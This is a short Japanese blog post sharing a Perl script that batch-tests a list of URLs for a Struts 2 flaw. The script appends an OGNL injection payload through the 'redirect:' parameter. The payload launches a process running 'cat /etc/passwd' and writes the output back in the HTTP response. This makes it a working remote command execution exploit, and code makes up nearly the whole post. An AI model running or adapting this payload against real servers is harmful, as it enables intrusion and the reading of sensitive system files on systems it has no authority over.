Perl測定Strut 2脆弱性

2129 ワード

手が安くてロットテストを書いた.の昨日はいくつかのものを測りました.の
#!/usr/bin/perl
use HTTP::Request;
use LWP::UserAgent;
use threads;
use Thread::Semaphore;
use Socket;


while(<>){
    Webscan($_);
}
sub Webscan
{
   local($scan_url)=shift;
      $tmp=$scan_url .'?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}';
      my $request=HTTP::Request->new(GET=>$tmp);
      my $uat=LWP::UserAgent->new();
      $uat->timeout(10);
      my $response=$uat->request($request);
      if($response->status_line=~/200/)
        {

        }else{
         print "------------------
"; # print $response->content; print $tmp; print "------------------
"; } }